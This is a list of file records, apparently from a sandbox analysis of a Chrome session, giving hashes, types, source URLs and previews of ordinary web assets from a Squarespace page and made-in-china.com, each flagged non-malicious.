                                                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2273
                                                                                                          Entropy (8bit):7.543362591034908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:475818BEBC4D0C7E915FF4D9EF5C4796
                                                                                                          SHA1:8EC2AA98038280D75C529499A7FB447BC9424B15
                                                                                                          SHA-256:CE690D518E1408AC7313BD9F9C5DA33DC65A7925F3EBB3AAAFAF884B41257F42
                                                                                                          SHA-512:EAEACB13EC43EDA8C422EEF18CB569B514C9E3E0BCE97B450B81F0C45BC2A3E00BF8428871C07C11F5039AF9D013E2A0591BA2EB2F84F48BB9A3ED7CA0F3C16F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................2.2...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(......(......(...<.c.c...o......>(..w..C.O...E{.)..OX.../+P...d..,.6...Xj.t.z.u..j:}......@.......>0x7...I...o.I5X<......gw..W:..c@.k.sT.I..y|.V...u..Krm-gh!.UX..^....?....t...u....~2.._...?._..,.'...O_.".t{.....).i..h.Y..J..}..*.H.kh.^..4..GJ..{k...w.....4.S..(............a...?.O....}..MS....>'~.:'.>.k.......f......h~....f..I.E.Xj.h.-.x.....F.AZ......1
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (18823)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):65788
                                                                                                          Entropy (8bit):5.303042584469253
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:DC6FBFBB54373319DC91CFF86340E63F
                                                                                                          SHA1:D8D593377136F21470AE29F0195266DC53E7F40B
                                                                                                          SHA-256:281D5B6CBE2D6EA8FA0273F728C48C2E3E90F0A6D3CFB71BDE0310EBCBB644BC
                                                                                                          SHA-512:676BAFAAFBC2EEF266855386AA9674080869A17DCF08F3E8BE81ADBB292ADC37BAC91C05F9C7A1503BA6A84D92FFBB1EBAF6ECCA09B1426EED2A189867E152FF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.acentdistributing.com/
                                                                                                          Preview:<!doctype html>.<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" >. <head>. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">. <meta name="viewport" content="width=device-width, initial-scale=1">. This is Squarespace. --> clover-turquoise-fz9m -->.<base href="">.<meta charset="utf-8" />.<title>Documents</title>.<meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /><link rel="icon" type="image/x-icon" href="https://assets.squarespace.com/universal/default-favicon.ico"/>.<link rel="canonical" href="https://www.acentdistributing.com"/>.<meta property="og:site_name" content="Documents"/>.<meta property="og:title" content="Documents"/>.<meta property="og:url" content="https://www.acentdistributing.com"/>.<meta property="og:type" content="website"/>.<meta property="og:image" content="http://static1.squarespace.com/static/66fc2125bd1193293900133a/t/6703f2f0f45689015e6
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (12150)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12323
                                                                                                          Entropy (8bit):5.494318505273094
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:AF70089388D2E92FA660172F1F449799
                                                                                                          SHA1:D12240C5CE7ABFD30074F26A5C1AC547AA6B080A
                                                                                                          SHA-256:4270F6608898CF342A0E14AB64F7B557CE7E5A81CB311FF5B60F8C2A3291C015
                                                                                                          SHA-512:89C15B99B97777BD7810D34F41B95D2ADC517A6FA6EFB6354A2237DE59476C43907482BEF2233BD13AB5796DBE05B363C007DA22AB5473BE628CF53C187D7C34
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[2775],{154229:c=>{c.exports={}},273549:c=>{c.exports={}},801563:c=>{c.exports={}},896766:c=>{c.exports={}},801579:(c,e,t)=>{"use strict";var n=t(875832);Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0;var u=n(t(987195)),s=n(t(845076)),a=n(t(174161)),m=t(647871);t(154229);var i=f=>{var r=f.checked,v=f.onChange,A=f.inputProps,d=()=>{v(!r)};return a.default.createElement("div",{className:"toggle-wrapper"},a.default.createElement("p",{"aria-hidden":"true"},r?(0,m.t)("On",null,{project:"gdpr-cookie-banner",notes:"A toggle is on"}):(0,m.t)("Off",null,{project:"gdpr-cookie-banner",notes:"A toggle is off"})),a.default.createElement("label",{className:(0,s.default)("sqs-toggle",{checked:r,"sqs-toggle--on":r,"sqs-toggle--off":!r})},a.default.createElement("input",(0,u.default)({type:"checkbox",checked:r,onChange:d},A))))},E=e.default=i;c.exports=e.default},932138:(c,e)=>{"use strict";Object.defineProperty(e,
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):44
                                                                                                          Entropy (8bit):3.7312702546075767
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0228936FE71FCDB472FB3559F9641C6F
                                                                                                          SHA1:DE728B7AD7FCF3BF4CD539EAEEE6C128E59E225C
                                                                                                          SHA-256:036DD6BB9175FBEAA40000C09643E5B153DCC8E76BD549D739A22418465E47E2
                                                                                                          SHA-512:F4209624E119BE7657B0B751B01C879821952A96DE6C5E91F60D36E09683353D7C07EF36337D66E7DCB77D4BB77C25397B220F74E3EC8AA61667D224ADB8D5C3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://membercenter.made-in-china.com/tm/web/token?visitorId=
                                                                                                          Preview:{"domain":"micen","token":"","subDomain":""}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):27
                                                                                                          Entropy (8bit):3.8841550945958057
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:517064A5A994ACE1153BB8178D6312B8
                                                                                                          SHA1:7E7454FEC7E5FB607F27C2C84F39F519B24402A3
                                                                                                          SHA-256:F1D045994ECBB8684A6A723F987C7008BE9C6E91CE072AC849ABA266822BC99D
                                                                                                          SHA-512:60BD6EFB239D7AE39CCAAD3925D19B79429A3A6ACD896C0DCBD641F922D910B18D3E7DAF7269F53B093F8F165AE35AA68866F0B1D982A95D25CF0A966269272A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:jsonp_1728320966213_56176()
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (12997)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):377105
                                                                                                          Entropy (8bit):5.596633351852525
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BD95D07A657A08593C6877683F1A118B
                                                                                                          SHA1:653E51AB5A1173AF10DECF6CBFE52277C9E3BF88
                                                                                                          SHA-256:A7F33CF48FAB52F855C3122EB6462D6DE425CE74A81D6275A495ED4D8EBD2267
                                                                                                          SHA-512:9B21675A3B0E8036B32DC3F709A194F6D0CE5759F0C3958B399174A6C5D1ADF5B488B01B8F56C54EFADAD99D076E528C8173BEB8ECA4671A46A9943D416CCD65
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-VEFCZRQMG4&l=dataLayer&cx=c
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"10",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":25,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":112},{"function":"__ogt_ip_mark","priority":25,"vtp_instanceOrder":1,"vtp_paramValue":"internal","vtp_ruleResult":["macro",2],"tag_id":114},{"function":"__ogt_ip_mark","priority":25,"vtp_instanceOrder":2,"vtp_paramValue":"internal","vtp_ruleResult":["macro",3],"tag_id":115},{"function":"__ogt_ip_mark","priority":25,"vtp_instanceOrder":3,"vtp_paramValue":"internal","vtp_ruleResult":["macro",4],"tag_id":116},{"function":"__ogt_cps","priority":25,"vtp_cpsAds":true,"vtp_cpsPlaystore":true,"vtp_c
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):966
                                                                                                          Entropy (8bit):4.9013288412109475
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:F39EB3455EFFD1298AC66BAF0D63C978
                                                                                                          SHA1:B9085C8B0CD703F061259951E766157CCF7836CF
                                                                                                          SHA-256:B5DBB305BC6FC31C1AF72B7BC33157DE259A029287FCB4A270BB7C457F09B662
                                                                                                          SHA-512:4992537FC638AB354D70373390F3C7F2176E53CF1313669D1CD04E5CC18D3862DEAA266209336CF3AE7E23808D9D3B179E9930B36AC40C5AE3FCCEF42DC05111
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://asia.creativecdn.com/topics-membership?ntk=fn6b8qNCIFeU1gIGpYhrUWr2BbVR_frLxrxW7dDQo8Jn9hMDaMCvjwnC2sfh_hi23l5c8ZsMO998q_5hKe0-EcsTQfW1fdK13V9jD9444cU
                                                                                                          Preview:<html><head></head><body>.<script>.function ignoreAsyncResult(x) { }..function readResponse(r) {. try {. if (r.ok) {. r.blob().then(ignoreAsyncResult, ignoreAsyncResult);. }. } catch (e) { }.}..function handleTopics(result) {. try {. if (Array.isArray(result)) {. var topicIds = result.map(function (topic) {. return topic.topic;. });. if (topicIds.length > 0 || Math.random() < 0.001) {. fetch('https://asia.creativecdn.com/topics-membership?ntk=fn6b8qNCIFeU1gIGpYhrUWr2BbVR_frLxrxW7dDQo8Jn9hMDaMCvjwnC2sfh_hi23l5c8ZsMO998q_5hKe0-EcsTQfW1fdK13V9jD9444cU&t=' + topicIds.join(',')). .then(readResponse, ignoreAsyncResult);. }. }. } catch (e) { }.}..try {. if (document.browsingTopics) {. document.browsingTopics(). .then(handleTopics, ignoreAsyncResult);. }.} catch (e) { }.</script>.</body></html>.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1059
                                                                                                          Entropy (8bit):5.14261896878437
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:EE4535463CE38F4679496F036DC64FA5
                                                                                                          SHA1:1615D5174C0A8DACBAF33DF77319CBDD06605308
                                                                                                          SHA-256:2337EE96D09719D87A9590C0234D352290ED58223F0EF6EE50022F3796F6CD9B
                                                                                                          SHA-512:334C9614A513C1235424C75941E690ADE2BA810C562DB89148CB1125651A3F0F639876244BD0C50CEE36B09DB49FD1228DB56B6FD9F2F9B5432B871D8A310B16
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://asia.creativecdn.com/ig-membership?ntk=UPTXWvcLB9hmYbU8oyEXzG_xlEpe3Fqqf5cmMJ-hgjuGxCHdsDZMKr7tnRAjW4tLKK3ltSGP1jIuQokJJjgjtlJST9Kf4L2NVkju6FTAc80
                                                                                                          Preview:<html><body>.<script type="module">. if (navigator.joinAdInterestGroup) {. const addIgScript = document.createElement('script');. let basePath = 'https://asia.creativecdn.com/ig-membership';. let fencedFramesEnabled = window.FencedFrameConfig !== undefined || 'src' in document.createElement('fencedframe');. let runAdAuctionEnabled = navigator.runAdAuction !== undefined. let label = null;. if ('cookieDeprecationLabel' in navigator) {. label = await navigator.cookieDeprecationLabel.getValue();. }. let basEnabled = navigator.getInterestGroupAdAuctionData !== undefined;. let params = new URLSearchParams({ntk : 'UPTXWvcLB9hmYbU8oyEXzG_xlEpe3Fqqf5cmMJ-hgjuGxCHdsDZMKr7tnRAjW4tLKK3ltSGP1jIuQokJJjgjtlJST9Kf4L2NVkju6FTAc80',lbl: label, ff: fencedFramesEnabled,checked: true,bas: basEnabled,ra : runAdAuctionEnabled });. addIgScript.setAttribute('src', basePath + '?' + params.toString());. document.bod
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (477), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):477
                                                                                                          Entropy (8bit):4.960058724315858
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:FD7B2B9786143CD422D9B5B8AA6714CA
                                                                                                          SHA1:7F7E6F29587AA557D9D6CFE15BCCC2CCC193B104
                                                                                                          SHA-256:94F890CAEEF7EB4647E4A8B0B3CE2324034957A0206190D66FD776EB361C30D9
                                                                                                          SHA-512:1BABFBC8C5732DE6B8425AC134219054917DBCF1B5457CFBA626B17C0F33B4336E31BF5B8A88F95E53350C929B635952AEFE29847B8928D6C2900625E3D58BE6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.made-in-china.com/head.do?xcase=entrances&lanCode=0&callback=jsonp_1728320966212_80556
                                                                                                          Preview:jsonp_1728320966212_80556([{"name":"Secured Trading Service","nofollow":false,"showNew":false,"link":"https://trading.made-in-china.com/","hoverDesc":null,"children":[]},{"name":"Video Channel","nofollow":false,"showNew":false,"link":"https://www.made-in-china.com/video-channel/","hoverDesc":null,"children":[]},{"name":"Top-ranking Products","nofollow":true,"showNew":false,"link":"https://www.made-in-china.com/best-sale/products-list.html","hoverDesc":null,"children":[]}])
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3108
                                                                                                          Entropy (8bit):7.917128557829354
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:73ED4BD560522B7476EB6632966991C9
                                                                                                          SHA1:8FBA0E36CD511CB5021874549276559E5B578D6B
                                                                                                          SHA-256:97E8CCCCB69250AB52FF5642AEC60AC5176598FE2E84349830DBF99AD86B34B8
                                                                                                          SHA-512:BA09902C7815DFEF4AAFF8304D8600E803603821719BD9088F8E64B98F2D8EE31206E5905D7437CF696E5C1ED769155315A8D1D62D5D34CBE0E72A82832A6100
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:RIFF....WEBPVP8L..../c......$)......|..".?..{.w9..<....!.;..;..3 ....$....3.|....}.(...mS....._.*.Pd..m.........5O.X.=..E$l...h...~..<XX..?..?...`..WOObF....$......O..nek.ug. .2.]...{.......Ss.V13s.....nx...T...dM.. I.#..(.......IJ...m.._..i.6uS.33o'.#.i.......#ogff823.}.u.8..?.......m.v....p*;....g.....k.......F.......=.@....fb.f..5.. . ...g.|0....*.p.0...w....^...u..wW....~......^p.+|#d. ~.c.....%.........9..i{.....f.r0.:XP......j.:.>....K-u..J:.y...Oi..5........f-w...}......W...oUl.h......`..:...._.&..m{..4...-$...}.=.k...I.\.7....o.IS..........I..f.o.e..[GR.......U.\....s...^L. KH.OC.r.(C8h.....|...x.>..4...."S*KL...n...w....C.o..HQ+. ...'.;....."..D..S.......E.B!q=.....K.....=...>G..."..05....I..0....BL.$.... .CL....&55a*a....\..;9....N'...7ea..!..)=..N`.#"..b9.Y...=.#..A...1(<... . .G....L.x....u<hj.q.i......OL<...hL|Q.w.j.mj<....p.V{....." ..G2 4T...8ypFL.hkkZaG...^*2.(.Up.m.s..v...=s.2...a...i ..........~....X.>.Z..D.....J....y
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19832, version 2.8978
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):19832
                                                                                                          Entropy (8bit):7.9900601153014685
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:ED2022705048507E5995EE72717E7FD4
                                                                                                          SHA1:570864C3BCCC3E0E203FDD67BE3CF850387FAEFB
                                                                                                          SHA-256:E7F4F778DDB41B7BE2D20810BB560ACEE79DA55ED5D3EEAC12F2BB8948F4453A
                                                                                                          SHA-512:ED1F0B98A8A9D510EEE33F65ABA70D59F616496F242924450A76F566B928ADDB86FA46F9E1056F47CBD1AE96C184CC025035E04DFC125834D7F7BF83A2FD2481
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/fontastic/dist/assets/roboto/400-regular/Roboto-Regular_3ca9c03e.woff2
                                                                                                          Preview:wOF2......Mx..........M...#.....................?FFTM..<..N....`..j.:..e..... ..$.6.$..*..X.. .....g..{.s.5lw........Qp\...TY8'....5.G...>........U.*..2...%<{...c..^.R*.#N.O.7]LL.&.&X..Vk.w.p.e.....iH..<..*.u.l....*T....i..+.H}.:..?.b...h.`...I...N.h$.C.~..5.g..Y....i...2!.*T2..6...U;C......F[.`.eP5.Rj.....#[j.." "....i.O7.......@..'H..S79.....@..<..Yg...4=..x.U.p.-bS.K.1.,...H.5.7.B+.X...|..^..N....;.}@Il.Rg.{..VU...rF..1~.]B."...I......UBexw.....f$.. h......J......6..nuW4..E{..Q)Y..5]...d!.h...aw.T.}R.p..8...L...uz..n....2t.<.s.../A.(Mz!.....jA..G....1Qg.k..eh.)..?..l.. ..N...b[.........R..I...!..4....k.O}.R,.]........./m...,tYz....2..R^H.*.1.2..._+.....R.t.!.3..s.q...Et..j..%B"..[..QC.\.j...1.....q..r....D.5.]@k..vA.ad@.. y.uK...(V=.w..8..w..3..... 4>......O..ZS. ..Ln..7.e....ZVQ.4.7...b...Z.hP....E.'}.n.......v.6.y=.....ruh...{a.....F3..<ijL..v... ..t..v...."$!.....}&.M.-.A".... .>..F..7.."...i..0........:..9...$ ........C"._;..`.5.[.>. .n.'....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2656)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2745
                                                                                                          Entropy (8bit):5.204720688294379
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E6F81127EFEE9A5304B0A7022103B16F
                                                                                                          SHA1:4A8CAE17331984603C237EF7271782E4E005F0FB
                                                                                                          SHA-256:DB98F63DF708009ECAF2EBCBF0867C61EACA97D81419665A7010CB09818ACF4C
                                                                                                          SHA-512:8A5819BD2B8AD0C92F51FF894139C8E25AC34880D38614B3C37E1EB9708476DB288C37E6E24084B74C83BF1CC5761312B8289A7FA71F3EE9E528441849C1EBE9
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/mic-search/js/home-2019/index_70629790.js
                                                                                                          Preview:void function(){if($(".J-urgent-notice")){var n=$(".J-notice-id:first").val();$(".J-notice-close").on("click",function(e){e.preventDefault();$(this).parents(".J-urgent-notice").animate({height:0,opacity:0},200);$.cookie("hnid",n,{expires:1})})}}.call(this);void function(){var l="ontouchend"in window?"touchend":"click";var n=(new Date).getTime();var e=function e(){var n=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth;var t=n>1024?"pic1440":"pic1024";$(".J-slider-home-box a.swiper-slide").each(function(e,n){if($(n).css("background-image")&&$(n).css("background-image").indexOf($(n).attr(t))===-1){$(n).css("background-image","url('"+$(n).attr(t)+"')").css("background-position-x","center")}})};e();$(window).on("resize",function(){return window.requestAnimationFrame(e)});var t=function e(n,t,i,o,a,r,s){var c=new Swiper(t,{loop:r>1,pagination:r>1?a:false,grabCursor:true,paginationClickable:true,autoHeight:true,autoplay:5e3,autoResize:true,resizeReInit:true,
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2422
                                                                                                          Entropy (8bit):7.901071174574203
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:61B67BEED1E2B019B8014D75B72B6B57
                                                                                                          SHA1:4B605F29962F7CF3FD140D760829291A63591570
                                                                                                          SHA-256:D3828F854EC60C0C7B014E8C44A4A4074B04A55BE7C6088E3408E4049D0D467B
                                                                                                          SHA-512:1D12C82445E5E05CF74CAA9E3C28B69043F459C02923216421EEC53BAA018E35A0EBA1C9A0A12310040DD10F0439AD2E604241FD7B67FD8A05DC90029440F389
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:RIFFn...WEBPVP8 b....*...*d.d.>9..C.!..I.@ ......m.../.gr.[..C.@......w...?@....:.}.<.?f~..o.d~.?Zs@6..c.oix.u....>.~;..._.~.j..... ..o...?49..[.}.O._.........C./.?..f>....d........(.W.]Z..3..*..z...W/W.........>......,....O....;z.......U...Y^R..e..E.._..}]f7...h..R..m.CU.eEF.uG./h...':...j/Qk..]S.{tx..N...x..A..F.}|...g....c..+....q....XiRYe.p.Y?J....r,......."....3Q.r.v%q..=h.2.....*f...!\........w.X1Y.O..a.eC..z.O......o..g.. .....L%.B.J.2l.......'A.......Oi.S.0b.......-..v?.I..q..J.MH.E.>&..........MY.....w..g.dK.).EW..B}..+.'....7y...}....j....{.Y.a8..|...bW...]^-}.... .w>..... ..?....5aYH.........(.m.6?..ui.*yk.......?%.&...t.~..=.GX,..!`x....[-#..........E.])..O.".\%...A'.K.. .F.qP...tbR<W.ul.....mp.~.Xl..UY.D...<....%.j.`. ......R.6.3F...U..A.\..$.{..S#.c1...e._/P.U..*...|+...j.En.w.|.k...BQ..J..#...J.K..J.F...A..k.@r.#7/.V.7DE.@3....!..q...M.I).%g..F*..}..:..-....$j......0R./..Y..U[........d.yr...f..........<..f.....k.c..lD.j-......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9625
                                                                                                          Entropy (8bit):7.889735526738146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:509D211309AE0FA50CE182C4EDB94BC5
                                                                                                          SHA1:ECFE3BB36ED2EAF8BC497F704CDE5CF0E8678CC5
                                                                                                          SHA-256:7215522A878968B6A67F0F76669D240C1D982C70E16B4C10A79267D7172C6DB6
                                                                                                          SHA-512:B29FCCA70A49BED336A4564B416A686A136FE665DEFEA57CF162BF2016DAE4C32F7E5341E39903A15DB97DB357D9E10F720027BF9FEB1DD551F09C75AEEA21D5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:e1195715-1056-ed4d-8173-4253f376f16c" xmpMM:DocumentID="xmp.did:11F3FDE97C7A11EFAC73BEF8B34066E4" xmpMM:InstanceID="xmp.iid:11F3FDE87C7A11EFAC73BEF8B34066E4" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c7181df1-2c82-6346-9be3-f39db4e1e114" stRef:documentID="adobe:docid:photoshop:8ecfdb6c-d52f-eb4a-9b06-0c87dd8add29"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (53025)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1559164
                                                                                                          Entropy (8bit):5.618399136544392
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:83897F6AF185E69EDC505156BEDB9342
                                                                                                          SHA1:C3B475ABCC890617536FCBC3789EF8EFBF0B020D
                                                                                                          SHA-256:739F273B2B712E9AF2AA517029D2D8D5CF3E5DBEDC14B8B94EE498B2BEA3E47C
                                                                                                          SHA-512:E82BA00FF67C345995A76DBF5DAAE6931FBB9701FFA80155AD099ECA517C5DCEA03D83F0444813384179E0DB589DEEC0B4347B21D176291ABB1D91EBE7E8B38D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://assets.squarespace.com/universal/scripts-compressed/common-e4650bfe0701012bc38f-min.en-US.js
                                                                                                          Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[68592,10054,22125,73946,58271,9201],{141126:(_,u,e)=>{"use strict";var d=e(875832),n=e(569644);Object.defineProperty(u,"__esModule",{value:!0}),u.default=c;var i=v(e(562215)),t=v(e(556628)),o=d(e(579085));function a(h){if(typeof WeakMap!="function")return null;var r=new WeakMap,s=new WeakMap;return(a=function(g){return g?s:r})(h)}function v(h,r){if(!r&&h&&h.__esModule)return h;if(h===null||n(h)!="object"&&typeof h!="function")return{default:h};var s=a(r);if(s&&s.has(h))return s.get(h);var f={__proto__:null},g=Object.defineProperty&&Object.getOwnPropertyDescriptor;for(var m in h)if(m!=="default"&&{}.hasOwnProperty.call(h,m)){var E=g?Object.getOwnPropertyDescriptor(h,m):null;E&&(E.get||E.set)?Object.defineProperty(f,m,E):f[m]=h[m]}return f.default=h,s&&s.set(h,f),f}function c(h,r,s,f,g){var m=t.uid(h._actionsRegistry,"".concat(r,".").concat(s));h._actionsRegistry[m]=1;var E={id:m,namespace:r,name:s},S=function(R){retu
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (27791)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):27995
                                                                                                          Entropy (8bit):5.300090021935189
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8275956B76EC443799A06D193EE224CE
                                                                                                          SHA1:DDEC4901DBBC63679A0E13FA868ECF676FF3B2EE
                                                                                                          SHA-256:CD449D1AD6C55F6CEBE4D4CD25D681B703062086962D994966401C68F66C7805
                                                                                                          SHA-512:8B81E5C03C4AF3EE0E4FACCA186822758E1BAAA808D0254F7B7281A275613C1E63837D331ABDE836939D1492F5A1C0AF66E7AA4FB1435E83401D73EC5CEB6AE4
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/business/global/sensors_track.js?r=1638442036473&r=1727402485614
                                                                                                          Preview:(function(){var u=document.location.href;var a=null;function d(e,n){var t,r={};for(t in e){r[t]=e[t]}for(t in n){r[t]=n[t]}return r}var o=function(){if(window.addEventListener){return function(e,n,t){n.addEventListener(e,t,false)}}else if(window.attachEvent){return function(e,n,t){n.attachEvent("on"+e,function(){t&&t()})}}}();function l(e,n,t){if(e){e(n,t)}else{sensors.track(n,t)}}function c(e,n){if(!(this instanceof c))return new c(e);if(!n&&a!==null)return a;if(!n){a=this}this.page_modules=e||[];if(!e||!(e instanceof Array)||e.length===0)return;this.click_exposure(this.page_modules);var t=null;var r=this;o("scroll",window,function(){if(t)return;var n=r.page_modules;t=setTimeout(function(){var e,a,o,c,s;for(i=0;i<n.length;i++){page_module=n[i];e=page_module["lvt"];if(typeof e==="undefined"||e&&(new Date).getTime()-e>5e3){(function(r){m(r["dom"],function(e){sensors_data={page_url:u,module_name:r["module"]};a=r["default_value"];o=r["exposure_values"];c=r["exposure_event_name"];s=r["cust
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):101583
                                                                                                          Entropy (8bit):5.332392230339748
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:FDB4E76F8A2D467D5D326B77216BA905
                                                                                                          SHA1:DF8BA3E9636B9AE6BB38C68ABD6CAC95D5812769
                                                                                                          SHA-256:DED63C12A860108F34FD7F7A3E9381F7B5FC990DBEB65C5D660724D3FCACF7ED
                                                                                                          SHA-512:90F24FAD235C550D5FED871D331C273C70C700D106930EBAAA37CCBFDCB7619F791AB43DBCF24DB600070FA52DCEC834F586CE1021032C4B8B6BFB3C6B97EBAE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/libs/jquery_2ad57377.js
